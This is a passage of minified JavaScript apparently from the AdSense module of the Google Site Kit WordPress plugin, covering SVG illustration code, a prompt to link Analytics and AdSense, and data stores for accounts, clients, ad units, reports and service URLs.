15.5s80.086 6.697 120.326 4.388c23.216-1.332 46.017-5.627 66.626.968 20.832 6.667 36.719 25.428 38.601 43.509"}),I.createElement("g",{filter:"url(#analytics-adsense-connect-mobile_svg__b)"},I.createElement("rect",{width:209.444,height:143,x:56,y:14,fill:"#fff",rx:11.44}),I.createElement("rect",{width:186.173,height:39.063,x:67.635,y:43.09,fill:"#DCE8FF",rx:4.29}),I.createElement("rect",{width:24.934,height:2.493,x:73.454,y:109.58,fill:"#9BB8F0",rx:1.247}),I.createElement("rect",{width:33.245,height:2.493,x:73.454,y:114.567,fill:"#9BB8F0",rx:1.247}),I.createElement("path",{fill:"#9BB8F0",d:"m177.792 64.58 16.175 17.573h-67.322l24.481-26.597 17.486 18.998z"}),I.createElement("path",{fill:"#EBEEF0",d:"M56 25.44C56 19.121 61.122 14 67.44 14h186.565c6.318 0 11.439 5.122 11.439 11.44v5.893H56z"}),I.createElement("rect",{width:5.778,height:5.778,x:64.666,y:19.778,fill:"#CBD0D3",rx:2.889}),I.createElement("rect",{width:5.778,height:5.778,x:73.333,y:19.778,fill:"#CBD0D3",rx:2.889}),I.createElement("rect",{width:49.037,height:45.712,x:67.635,y:90.464,fill:"#EBEEF0",rx:4.536}),I.createElement("rect",{width:44.881,height:8.311,x:126.646,y:90.464,fill:"#EBEEF0",rx:4.156}),I.createElement("rect",{width:127.163,height:4.156,x:126.646,y:106.255,fill:"#EBEEF0",rx:2.078}),I.createElement("rect",{width:127.163,height:4.156,x:126.646,y:117.06,fill:"#EBEEF0",rx:2.078}),I.createElement("path",{fill:"#E1B155",d:"M235.947 131.708c9.864 0 17.861-2.932 17.861-6.549v-2.381h-35.722v2.381c0 3.617 7.997 6.549 17.861 6.549"}),I.createElement("ellipse",{cx:235.947,cy:121.947,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M235.406 124.011v-.399a3.8 3.8 0 0 1-.749-.128 2.5 2.5 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.444l.791-.174q.101.201.37.361.279.16.64.207v-1.017l-.025-.009q-.673-.138-1.111-.358-.438-.224-.438-.572 0-.206.185-.389.194-.183.547-.303a3 3 0 0 1 .842-.146v-.394h.674v.403q.436.036.732.142.303.1.471.234a.9.9 0 0 1 .244.251l-.774.184a.7.7 0 0 0-.236-.202 1.3 1.3 0 0 0-.437-.151v.962q.454.1.808.224.352.12.555.289.21.165.21.412 0 .27-.227.458a1.6 1.6 0 0 1-.581.298q-.353.11-.765.142v.403zm-.707-2.817q0 .147.177.247.185.096.53.188v-.824a1.5 1.5 0 0 0-.513.142q-.194.105-.194.247m2.079 1.52q0-.155-.185-.251a2.3 2.3 0 0 0-.513-.184v.866q.303-.042.496-.151.202-.11.202-.28"}),I.createElement("path",{fill:"#E1B155",d:"M235.947 126.722c9.864 0 17.861-2.932 17.861-6.549v-2.382h-35.722v2.382c0 3.617 7.997 6.549 17.861 6.549"}),I.createElement("ellipse",{cx:235.947,cy:116.96,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M235.406 119.024v-.399a3.8 3.8 0 0 1-.749-.128 2.5 2.5 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.444l.791-.174q.101.201.37.362.279.16.64.206v-1.017l-.025-.009a4.6 4.6 0 0 1-1.111-.357q-.438-.225-.438-.573 0-.206.185-.389a1.5 1.5 0 0 1 .547-.302q.354-.124.842-.147v-.394h.674v.403q.436.037.732.142.303.1.471.234a.9.9 0 0 1 .244.252l-.774.183a.75.75 0 0 0-.236-.202 1.3 1.3 0 0 0-.437-.151v.962q.454.1.808.224.352.12.555.289.21.165.21.412 0 .27-.227.458a1.6 1.6 0 0 1-.581.298q-.353.11-.765.142v.403zm-.707-2.817q0 .147.177.248.185.096.53.187v-.824a1.5 1.5 0 0 0-.513.142q-.194.106-.194.247m2.079 1.521q0-.156-.185-.252a2.4 2.4 0 0 0-.513-.183v.865q.303-.041.496-.151.202-.11.202-.279"}),I.createElement("path",{fill:"#E1B155",d:"M235.947 121.735c9.864 0 17.861-2.932 17.861-6.549v-2.382h-35.722v2.382c0 3.617 7.997 6.549 17.861 6.549"}),I.createElement("ellipse",{cx:235.947,cy:111.973,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M235.406 114.037v-.398a4 4 0 0 1-.749-.129 2.5 2.5 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.444l.791-.174q.101.201.37.362.279.16.64.206v-1.017l-.025-.009a4.5 4.5 0 0 1-1.111-.357q-.438-.225-.438-.573 0-.206.185-.389a1.5 1.5 0 0 1 .547-.302q.354-.124.842-.147v-.393h.674v.403q.436.036.732.141.303.102.471.234a.9.9 0 0 1 .244.252l-.774.183a.7.7 0 0 0-.236-.201 1.2 1.2 0 0 0-.437-.152v.962q.454.1.808.225.352.118.555.288.21.165.21.412 0 .27-.227.458a1.6 1.6 0 0 1-.581.298 3.5 3.5 0 0 1-.765.142v.403zm-.707-2.817q0 .147.177.248.185.096.53.188v-.825a1.5 1.5 0 0 0-.513.142q-.194.105-.194.247m2.079 1.521q0-.156-.185-.252a2.4 2.4 0 0 0-.513-.183v.865q.303-.04.496-.151.202-.11.202-.279"}),I.createElement("path",{fill:"#E1B155",d:"M235.947 116.748c9.864 0 17.861-2.932 17.861-6.549v-2.381h-35.722v2.381c0 3.617 7.997 6.549 17.861 6.549"}),I.createElement("ellipse",{cx:235.947,cy:106.986,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M235.406 109.05v-.398a4 4 0 0 1-.749-.128 2.5 2.5 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.445l.791-.174q.101.202.37.362.279.16.64.206v-1.016l-.025-.01q-.673-.136-1.111-.357-.438-.224-.438-.572 0-.206.185-.39.194-.182.547-.302a3 3 0 0 1 .842-.146v-.394h.674v.403q.436.036.732.142.303.1.471.233a.9.9 0 0 1 .244.252l-.774.183a.7.7 0 0 0-.236-.201 1.2 1.2 0 0 0-.437-.151v.961q.454.101.808.225.352.119.555.288.21.165.21.413 0 .27-.227.458a1.6 1.6 0 0 1-.581.297 3.5 3.5 0 0 1-.765.142v.403zm-.707-2.816q0 .146.177.247.185.096.53.188v-.825a1.5 1.5 0 0 0-.513.142q-.194.106-.194.248m2.079 1.52q0-.156-.185-.252a2.4 2.4 0 0 0-.513-.183v.866q.303-.042.496-.151.202-.11.202-.28"}),I.createElement("path",{fill:"#E1B155",d:"M235.947 111.761c9.864 0 17.861-2.932 17.861-6.549v-2.381h-35.722v2.381c0 3.617 7.997 6.549 17.861 6.549"}),I.createElement("ellipse",{cx:235.947,cy:102,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M235.406 104.063v-.398a3.8 3.8 0 0 1-.749-.128 2.5 2.5 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.444l.791-.174q.101.201.37.361.279.16.64.206v-1.016l-.025-.009q-.673-.138-1.111-.358-.438-.224-.438-.572 0-.206.185-.389.194-.183.547-.303a3 3 0 0 1 .842-.146v-.394h.674v.403q.436.037.732.142.303.1.471.234a.9.9 0 0 1 .244.251l-.774.184a.7.7 0 0 0-.236-.202 1.3 1.3 0 0 0-.437-.151v.962q.454.1.808.224.352.119.555.289.21.165.21.412 0 .27-.227.458a1.6 1.6 0 0 1-.581.297 3.4 3.4 0 0 1-.765.142v.403zm-.707-2.816q0 .147.177.247.185.096.53.188v-.824a1.5 1.5 0 0 0-.513.142q-.194.105-.194.247m2.079 1.52q0-.154-.185-.252a2.4 2.4 0 0 0-.513-.183v.866q.303-.042.496-.151.202-.11.202-.28"}),I.createElement("path",{fill:"#E1B155",d:"M235.947 106.775c9.864 0 17.861-2.933 17.861-6.549v-2.382h-35.722v2.382c0 3.616 7.997 6.549 17.861 6.549"}),I.createElement("ellipse",{cx:235.947,cy:97.013,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M235.406 99.077v-.399a3.8 3.8 0 0 1-.749-.128 2.5 2.5 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.444l.791-.174q.101.201.37.362a1.7 1.7 0 0 0 .64.206v-1.017l-.025-.01a4.5 4.5 0 0 1-1.111-.356q-.438-.224-.438-.573 0-.206.185-.39.194-.182.547-.301.354-.124.842-.147v-.394h.674v.403q.436.037.732.142.303.1.471.234a.9.9 0 0 1 .244.252l-.774.183a.7.7 0 0 0-.236-.202 1.2 1.2 0 0 0-.437-.15v.96q.454.102.808.225.352.12.555.289.21.165.21.412 0 .27-.227.458a1.6 1.6 0 0 1-.581.298q-.353.11-.765.142v.403zm-.707-2.817q0 .147.177.247.185.097.53.188v-.824a1.5 1.5 0 0 0-.513.142q-.194.105-.194.247m2.079 1.52q0-.155-.185-.251a2.4 2.4 0 0 0-.513-.183v.865q.303-.041.496-.151.202-.11.202-.28"}),I.createElement("path",{stroke:"#E1B155",strokeWidth:1.349,d:"M250.751 97.013c0 .455-.265.987-.969 1.563-.698.572-1.751 1.117-3.11 1.588-2.713.939-6.505 1.532-10.725 1.532s-8.012-.593-10.725-1.532c-1.36-.47-2.412-1.016-3.111-1.588-.704-.576-.969-1.108-.969-1.563 0-.456.265-.988.969-1.564.699-.572 1.751-1.117 3.111-1.587 2.713-.94 6.505-1.533 10.725-1.533s8.012.593 10.725 1.533c1.359.47 2.412 1.015 3.11 1.587.704.576.969 1.108.969 1.564Z"}),I.createElement("ellipse",{cx:211.845,cy:127.765,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("ellipse",{cx:211.845,cy:122.778,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M211.304 124.842v-.399a3.8 3.8 0 0 1-.749-.128 2.5 2.5 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.444l.791-.174q.101.201.37.362.279.16.64.206v-1.017l-.025-.009a4.6 4.6 0 0 1-1.111-.357q-.438-.225-.438-.573 0-.206.185-.389a1.5 1.5 0 0 1 .547-.302q.354-.124.842-.147v-.394h.673v.403q.438.037.733.142.303.1.471.234a.9.9 0 0 1 .244.252l-.774.183a.7.7 0 0 0-.236-.202 1.3 1.3 0 0 0-.438-.151v.962q.455.1.808.224.354.12.556.289.21.165.21.412 0 .27-.227.458a1.6 1.6 0 0 1-.581.298 3.5 3.5 0 0 1-.766.142v.403zm-.707-2.817q0 .147.177.247.185.097.53.188v-.824a1.5 1.5 0 0 0-.513.142q-.194.105-.194.247m2.079 1.521q0-.156-.185-.252a2.4 2.4 0 0 0-.514-.183v.865q.303-.041.497-.151.202-.11.202-.279"}),I.createElement("path",{fill:"#E1B155",d:"M211.845 127.553c9.864 0 17.861-2.932 17.861-6.549v-2.382h-35.722v2.382c0 3.617 7.996 6.549 17.861 6.549"}),I.createElement("ellipse",{cx:211.845,cy:117.791,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M211.304 119.855v-.399a3.8 3.8 0 0 1-.749-.128 2.5 2.5 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.444l.791-.174q.101.201.37.362.279.16.64.206v-1.017l-.025-.009a4.6 4.6 0 0 1-1.111-.357q-.438-.225-.438-.573 0-.206.185-.389a1.5 1.5 0 0 1 .547-.302q.354-.124.842-.147v-.394h.673v.403q.438.037.733.142.303.101.471.234a.9.9 0 0 1 .244.252l-.774.183a.7.7 0 0 0-.236-.201 1.2 1.2 0 0 0-.438-.152v.962q.455.1.808.225.354.118.556.288.21.165.21.412 0 .27-.227.458a1.6 1.6 0 0 1-.581.298 3.5 3.5 0 0 1-.766.142v.403zm-.707-2.817q0 .147.177.248.185.096.53.187v-.824a1.5 1.5 0 0 0-.513.142q-.194.105-.194.247m2.079 1.521q0-.156-.185-.252a2.4 2.4 0 0 0-.514-.183v.865q.303-.041.497-.151.202-.11.202-.279"}),I.createElement("path",{fill:"#E1B155",d:"M211.845 122.566c9.864 0 17.861-2.932 17.861-6.549v-2.381h-35.722v2.381c0 3.617 7.996 6.549 17.861 6.549"}),I.createElement("ellipse",{cx:211.845,cy:112.804,fill:"#FECE72",rx:17.861,ry:6.549}),I.createElement("path",{fill:"#AA7A1E",d:"M211.304 114.868v-.398a3.8 3.8 0 0 1-.749-.129 2.4 2.4 0 0 1-.64-.284 1.2 1.2 0 0 1-.412-.444l.791-.174q.101.202.37.362.279.16.64.206v-1.017l-.025-.009q-.673-.136-1.111-.357-.438-.225-.438-.572 0-.207.185-.39a1.5 1.5 0 0 1 .547-.302q.354-.123.842-.147v-.393h.673v.403q.438.036.733.142.303.1.471.233a.9.9 0 0 1 .244.252l-.774.183a.7.7 0 0 0-.236-.201 1.2 1.2 0 0 0-.438-.151v.961q.455.101.808.225.354.118.556.288.21.166.21.412a.57.57 0 0 1-.227.458 1.6 1.6 0 0 1-.581.298 3.5 3.5 0 0 1-.766.142v.403zm-.707-2.816q0 .146.177.247.185.096.53.188v-.825a1.5 1.5 0 0 0-.513.142q-.194.105-.194.248m2.079 1.52q0-.156-.185-.252a2.4 2.4 0 0 0-.514-.183v.866q.303-.042.497-.152.202-.11.202-.279"}),I.createElement("path",{stroke:"#E1B155",strokeWidth:1.349,d:"M226.649 112.804c0 .456-.265.988-.969 1.564-.698.572-1.751 1.117-3.11 1.587-2.713.94-6.505 1.533-10.725 1.533s-8.012-.593-10.725-1.533c-1.36-.47-2.412-1.015-3.111-1.587-.704-.576-.969-1.108-.969-1.564s.265-.987.969-1.563c.699-.572 1.751-1.117 3.111-1.588 2.713-.939 6.505-1.532 10.725-1.532s8.012.593 10.725 1.532c1.359.471 2.412 1.016 3.11 1.588.704.576.969 1.108.969 1.563Z"})))),Mt||(Mt=I.createElement("defs",null,I.createElement("clipPath",{id:"analytics-adsense-connect-mobile_svg__a"},I.createElement("path",{fill:"#fff",d:"M0 0h343v123H0z"})),I.createElement("filter",{id:"analytics-adsense-connect-mobile_svg__b",width:236.04,height:169.596,x:42.702,y:4.026,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},I.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),I.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),I.createElement("feOffset",{dy:3.325}),I.createElement("feGaussianBlur",{stdDeviation:6.649}),I.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),I.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),I.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_413_2382"}),I.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_413_2382",result:"shape"})))));var Tt=i(83366);const St="LinkAnalyticsAndAdSenseAccountsOverlayNotification";function LinkAnalyticsAndAdSenseAccountsOverlayNotification({id:e,Notification:t}){const i=(0,a.useSelect)(e=>e(N.O4).getGoogleSupportURL({path:"/adsense/answer/6084409"})),{dismissNotification:s}=(0,a.useDispatch)(Ke.D);return(0,G.jsx)(t,{children:(0,G.jsx)(ut.A,{notificationID:e,title:(0,g.__)("See which content earns you the most","google-site-kit"),description:(0,g.__)("Link your Analytics and AdSense accounts to find out which content brings you the most revenue.","google-site-kit"),GraphicDesktop:yt,GraphicMobile:ft,ctaButton:{href:i,target:"_blank",label:(0,g.__)("Learn how","google-site-kit"),trailingIcon:(0,G.jsx)(Tt.A,{width:13,height:13}),onClick:()=>s(e)},dismissButton:!0})})}LinkAnalyticsAndAdSenseAccountsOverlayNotification.propTypes={id:ee().string.isRequired,Notification:ee().elementType.isRequired};var kt=i(32981),jt=i(46763),vt=i(8084);const bt="COMPLETE_ACCOUNT_SETUP",_t="COMPLETE_SITE_SETUP",xt="RECEIVE_ORIGINAL_USE_SNIPPET",Ct={originalUseSnippet:void 0},Dt={*completeAccountSetup(){return yield{payload:{},type:bt}},*completeSiteSetup(){return yield{payload:{},type:_t}},receiveOriginalUseSnippet:e=>(xe()(e,"originalUseSnippet is required."),{payload:{originalUseSnippet:e},type:xt})},Et={[bt]:(0,a.createRegistryControl)(e=>async()=>{if(await e.dispatch(k.wl).setAccountSetupComplete(!0),!e.select(k.wl).canSubmitChanges())return await e.dispatch(k.wl).setAccountSetupComplete(!1),!1;const{error:t}=await e.dispatch(k.wl).submitChanges();return!t||(await e.dispatch(k.wl).setAccountSetupComplete(!1),!1)}),[_t]:(0,a.createRegistryControl)(e=>async()=>{if(await e.dispatch(k.wl).setSiteSetupComplete(!0),!e.select(k.wl).canSubmitChanges())return await e.dispatch(k.wl).setSiteSetupComplete(!1),!1;const{error:t}=await e.dispatch(k.wl).submitChanges();return!t||(await e.dispatch(k.wl).setSiteSetupComplete(!1),!1)})},wt=(0,a.createReducer)((e,t)=>{switch(t.type){case xt:{const{originalUseSnippet:i}=t.payload;e.originalUseSnippet=i;break}case"RECEIVE_GET_SETTINGS":{const{response:i}=t.payload,{useSnippet:a}=i;void 0===e.originalUseSnippet&&(e.originalUseSnippet=a);break}}}),Zt={*getOriginalUseSnippet(){const e=yield a.commonActions.getRegistry();void 0===e.select(k.wl).getOriginalUseSnippet()&&e.select(k.wl).getSettings()}},Rt={isDoingSaveUseSnippet:e=>Object.values(e.isFetchingSaveUseSnippet).some(Boolean),getOriginalUseSnippet:e=>e.originalUseSnippet};const Lt=(0,a.combineStores)({initialState:Ct,actions:Dt,controls:Et,reducer:wt,resolvers:Zt,selectors:Rt}),Gt=(Lt.initialState,Lt.actions,Lt.controls,Lt.reducer,Lt.resolvers,Lt.selectors,Lt),zt=n().createModuleStore(F.Py,{ownedSettingsSlugs:["accountID","clientID"],storeName:k.wl,settingSlugs:["accountID","clientID","useSnippet","accountStatus","siteStatus","accountSetupComplete","siteSetupComplete","ownerID","webStoriesAdUnit","autoAdsDisabled","setupCompletedTimestamp","useAdBlockingRecoverySnippet","useAdBlockingRecoveryErrorSnippet","adBlockingRecoverySetupStatus"],validateCanSubmitChanges:function(e){const t=(0,vt.WI)(e),{getAccountID:i,getClientID:a,getAccountStatus:s,haveSettingsChanged:o,isDoingSubmitChanges:n}=t(k.wl);xe()(!n(),jt.mV),xe()(o(),jt.Wq),xe()(s(),"require an account status to be present");const r=i();xe()(""===r||(0,E.H)(r),"require account ID to be either empty (if impossible to determine) or valid");const l=a();xe()(""===l||(0,E.X)(l),"require client ID to be either empty (if impossible to determine) or valid")},validateIsSetupBlocked:e=>{if(e(ae.oR).isAdBlockerActive())throw new Error("Ad blocker detected")}});var Ot=i(54419),Pt=i(35812),Bt=i(73866);const Ut="RESET_ACCOUNTS",Wt=(0,Pt.U)({baseName:"getAccounts",controlCallback:()=>(0,Ot.get)("modules",F.Py,"accounts",void 0,{useCache:!1}),reducerCallback:(0,a.createReducer)((e,t)=>{e.accounts=t})}),Ht={accounts:void 0},Vt={*resetAccounts(){const{dispatch:e}=yield a.commonActions.getRegistry();return yield{payload:{},type:Ut},yield Bt.o1.clearErrors("getAccounts"),e(k.wl).invalidateResolutionForStoreSelector("getAccounts")}},Yt=(0,a.createReducer)((e,t)=>{switch(t.type){case Ut:{const{accountID:t,clientID:i,accountStatus:a,siteStatus:s,accountSetupComplete:o,siteSetupComplete:n}=e.savedSettings||{};e.accounts=Ht.accounts,e.settings={...e.settings||{},accountID:t,clientID:i,accountStatus:a,siteStatus:s,accountSetupComplete:o,siteSetupComplete:n};break}}}),Ft={*getAccounts(){(yield a.commonActions.getRegistry()).select(k.wl).getAccounts()||(yield Wt.actions.fetchGetAccounts())}},Qt={getAccounts(e){const{accounts:t}=e;return t}},Jt=(0,a.combineStores)(Wt,{initialState:Ht,actions:Vt,reducer:Yt,resolvers:Ft,selectors:Qt}),Xt=(Jt.initialState,Jt.actions,Jt.controls,Jt.reducer,Jt.resolvers,Jt.selectors,Jt),qt=(0,Pt.U)({baseName:"getAdUnits",controlCallback:({accountID:e,clientID:t})=>(0,Ot.get)("modules",F.Py,"adunits",{accountID:e,clientID:t},{useCache:!1}),reducerCallback:(0,a.createReducer)((e,t,{accountID:i,clientID:a})=>{e.adunits=e.adunits||{},e.adunits[`${i}::${a}`]=t}),argsToParams:(e,t)=>({accountID:e,clientID:t}),validateParams:({accountID:e,clientID:t}={})=>{xe()(e,"accountID is required."),xe()(t,"clientID is required.")}}),Kt=(0,a.createReducer)((e,t)=>{t.type}),$t={*getAdUnits(e,t){if(void 0===e||void 0===t)return;(yield a.commonActions.getRegistry()).select(k.wl).getAdUnits(e,t)||(yield qt.actions.fetchGetAdUnits(e,t))}},ei={getAdUnits(e,t,i){if(void 0!==t&&void 0!==i)return e.adunits[`${t}::${i}`]}},ti=(0,a.combineStores)(qt,{initialState:{adunits:{}},actions:{},reducer:Kt,resolvers:$t,selectors:ei}),ii=(ti.initialState,ti.actions,ti.controls,ti.reducer,ti.resolvers,ti.selectors,ti),ai="RESET_CLIENTS",si=(0,Pt.U)({baseName:"getClients",controlCallback:({accountID:e})=>(0,Ot.get)("modules",F.Py,"clients",{accountID:e},{useCache:!1}),reducerCallback:(0,a.createReducer)((e,t,{accountID:i})=>{Array.isArray(t)&&(e.clients=e.clients||{},e.clients[i]=t)}),argsToParams:e=>({accountID:e}),validateParams:({accountID:e}={})=>{xe()(e,"accountID is required.")}}),oi={*resetClients(){const{dispatch:e}=yield a.commonActions.getRegistry();return yield{payload:{},type:ai},yield Bt.o1.clearErrors("getClients"),e(k.wl).invalidateResolutionForStoreSelector("getClients")}},ni=(0,a.createReducer)((e,t)=>{switch(t.type){case ai:{const{clientID:t,accountStatus:i,siteStatus:a,accountSetupComplete:s,siteSetupComplete:o}=e.savedSettings||{};e.clients=di.clients,e.settings={...e.settings||{},clientID:t,accountStatus:i,siteStatus:a,accountSetupComplete:s,siteSetupComplete:o};break}}}),ri={*getClients(e){if(void 0===e||!(0,E.H)(e))return;(yield a.commonActions.getRegistry()).select(k.wl).getClients(e)||(yield si.actions.fetchGetClients(e))}},li={getClients(e,t){if(void 0===t)return;const{clients:i}=e;return i[t]},getAFCClient:(0,a.createRegistrySelector)(e=>(t,i)=>{if(void 0===i)return;const a=e(k.wl).getClients(i);if(void 0===a)return;const s=a.filter(e=>"AFC"===e.productCode);return s.length?s[0]:null})},ci=(0,a.combineStores)(si,{initialState:{clients:{}},actions:oi,reducer:ni,resolvers:ri,selectors:li}),di=ci.initialState,gi=(ci.actions,ci.controls,ci.reducer,ci.resolvers,ci.selectors,ci);var ui=i(73730);const mi=["ACTIVE_VIEW_MEASURABILITY","ACTIVE_VIEW_TIME","ACTIVE_VIEW_VIEWABILITY","AD_REQUESTS_COVERAGE","AD_REQUESTS_CTR","AD_REQUESTS_RPM","AD_REQUESTS_SPAM_RATIO","AD_REQUESTS","ADS_PER_IMPRESSION","CLICKS_SPAM_RATIO","CLICKS","COST_PER_CLICK","ESTIMATED_EARNINGS","IMPRESSIONS_CTR","IMPRESSIONS_RPM","IMPRESSIONS_SPAM_RATIO","IMPRESSIONS","INDIVIDUAL_AD_IMPRESSIONS_CTR","INDIVIDUAL_AD_IMPRESSIONS_RPM","INDIVIDUAL_AD_IMPRESSIONS_SPAM_RATIO","INDIVIDUAL_AD_IMPRESSIONS","MATCHED_AD_REQUESTS_CTR","MATCHED_AD_REQUESTS_RPM","MATCHED_AD_REQUESTS_SPAM_RATIO","MATCHED_AD_REQUESTS","METRIC_UNSPECIFIED","PAGE_VIEWS_CTR","PAGE_VIEWS_RPM","PAGE_VIEWS_SPAM_RATIO","PAGE_VIEWS","TOTAL_EARNINGS","TOTAL_IMPRESSIONS","WEBSEARCH_RESULT_PAGES"],pi=["ACCOUNT_NAME","AD_CLIENT_ID","AD_FORMAT_CODE","AD_FORMAT_NAME","AD_PLACEMENT_CODE","AD_PLACEMENT_NAME","AD_UNIT_ID","AD_UNIT_NAME","AD_UNIT_SIZE_CODE","AD_UNIT_SIZE_NAME","BID_TYPE_CODE","BID_TYPE_NAME","BUYER_NETWORK_ID","BUYER_NETWORK_NAME","CONTENT_PLATFORM_CODE","CONTENT_PLATFORM_NAME","COUNTRY_CODE","COUNTRY_NAME","CREATIVE_SIZE_CODE","CREATIVE_SIZE_NAME","CUSTOM_CHANNEL_ID","CUSTOM_CHANNEL_NAME","CUSTOM_SEARCH_STYLE_ID","CUSTOM_SEARCH_STYLE_NAME","DATE","DIMENSION_UNSPECIFIED","DOMAIN_CODE","DOMAIN_NAME","DOMAIN_REGISTRANT","MONTH","OWNED_SITE_DOMAIN_NAME","OWNED_SITE_ID","PLATFORM_TYPE_CODE","PLATFORM_TYPE_NAME","PRODUCT_CODE","PRODUCT_NAME","REQUESTED_AD_TYPE_CODE","REQUESTED_AD_TYPE_NAME","SERVED_AD_TYPE_CODE","SERVED_AD_TYPE_NAME","TARGETING_TYPE_CODE","TARGETING_TYPE_NAME","URL_CHANNEL_ID","URL_CHANNEL_NAME","WEBSEARCH_QUERY_STRING","WEEK"];const Ii=(0,Pt.U)({baseName:"getReport",controlCallback:({options:e})=>(0,Ot.get)("modules",F.Py,"report",e),reducerCallback:(0,a.createReducer)((e,t,{options:i})=>{e.reports=e.reports||{},e.reports[(0,S.Zm)(i)]=t}),argsToParams:e=>({options:e}),validateParams:({options:e}={})=>{xe()((0,j.isPlainObject)(e),"options must be an object."),xe()((0,ui.O5)(e),"Either date range or start/end dates must be provided for AdSense report.");const{orderby:t,metrics:i,dimensions:a}=e;xe()((0,ui.cq)(i),"Metrics for an AdSense report must be either a string or an array of strings."),function(e){const t=(0,j.castArray)(e);xe()(t.length,"at least one metric is required.");const i=t.filter(e=>!mi.includes(e));xe()(0===i.length,`invalid AdSense metrics requested: ${i.toString()}`)}(i),a&&(xe()((0,ui.cq)(a),"Dimensions for an AdSense report must be either a string or an array of strings."),function(e){const t=(0,j.castArray)(e);xe()(t.length,"at least one dimension is required.");const i=t.filter(e=>!pi.includes(e));xe()(0===i.length,`invalid AdSense dimensions requested: ${i.toString()}`)}(a)),t&&xe()((0,ui.G4)(t),'Orders for an AdSense report must be either an object or an array of objects where each object should have "fieldName" and "sortOrder" properties.')}}),hi={*getReport(e={}){(yield a.commonActions.getRegistry()).select(k.wl).getReport(e)||(yield Ii.actions.fetchGetReport(e))}},yi={getReport(e,t={}){const{reports:i}=e;return i[(0,S.Zm)(t)]}},Ai=(0,a.combineStores)(Ii,{initialState:{reports:{}},resolvers:hi,selectors:yi}),Mi=(Ai.initialState,Ai.actions,Ai.controls,Ai.reducer,Ai.resolvers,Ai.selectors,Ai);const Ni=(0,i(75498).d)({storeName:k.wl,tagMatchers:[/google_ad_client: ?["|'](.*?)["|']/,/<(?:script|amp-auto-ads) [^>]*data-ad-client="([^"]+)"/,/<(?:script|amp-auto-ads)[^>]*src="[^"]*\?client=(ca-pub-[^"]+)"[^>]*>/],isValidTag:E.X}),fi={selectors:{getAdBlockerWarningMessage:(0,a.createRegistrySelector)(e=>()=>{const t=e(ae.oR).isAdBlockerActive();if(void 0===t)return;if(!t)return null;return e(Y.i).isModuleConnected(F.Py)?(0,g.__)("To get the latest AdSense data you will need to disable your Ad blocker","google-site-kit"):(0,g.__)("To set up AdSense you will need to disable your Ad blocker","google-site-kit")})}};var Ti=i(51568);const Si={selectors:{getServiceURL:(0,a.createRegistrySelector)(e=>(t,{path:i,query:a}={})=>{let s="https://www.google.com/adsense/new/u/0";if(i){s=`${s}${`/${i.replace(/^\//,"")}`}`}a&&(s=(0,Ti.F)(s,a));const o=e(ae.oR).getAccountChooserURL(s);if(void 0!==o)return o}),getServiceCreateAccountURL:(0,a.createRegistrySelector)(e=>()=>{const t=e(N.O4).getReferenceSiteURL(),i={source:"site-kit",utm_source:"site-kit",utm_medium:"wordpress_signup"};return void 0!==t&&(i.url=Z(t)),(0,Ti.F)("https://www.google.com/adsense/signup",i)}),getServiceAccountURL:(0,a.createRegistrySelector)(e=>()=>{const t=e(k.wl).getAccountID();if(void 0===t)return;return e(k.wl).getServiceURL({accountID:t,query:{source:"site-kit"}})}),getServiceReportURL:(0,a.createRegistrySelector)(e=>(t,i)=>{const a=e(k.wl).getAccountID();if(void 0===a)return;const s={...i},o=e(N.O4).getReferenceSiteURL(),n=o&&Z(o);n&&(s.dd=`1YsiteY1Y${n}Y${n}`);const r=`${a}/reporting`;return e(k.wl).getServiceURL({path:r,query:s})}),getServiceAccountManageSiteURL:(0,a.createRegistrySelector)(e=>()=>{const t=e(k.wl).getAccountID(),i=e(N.O4).getReferenceSiteURL();if(void 0===t||void 0===i)return;const a=`${t}/sites/my-sites`,s={source:"site-kit",url:Z(i)||i};return e(k.wl).getServiceURL({path:a,query:s})}),getServiceAccountManageSitesURL:(0,a.createRegistrySelector)(e=>()=>{const t=e(k.wl).getAccountID();if(void 0===t)return;const i=`${t}/sites/my-sites`;return e(k.wl).getServiceURL({path:i,query:{source:"site-kit"}})}),getServiceAccountSiteAdsPreviewURL:(0,a.createRegistrySelector)(e=>()=>{const t=e(k.wl).getAccountID(),i=e(N.O4).getReferenceSiteURL();if(void 0===t||void 0===i)return;const a=`${t}/myads/sites/preview`,s={source:"site-kit",url:Z(i)||i};return e(k.wl).getServiceURL({path:a,query:s})}),getDetailsLinkURL:(0,a.createRegistrySelector)(e=>()=>e(k.wl).getServiceAccountManageSitesURL())}};const 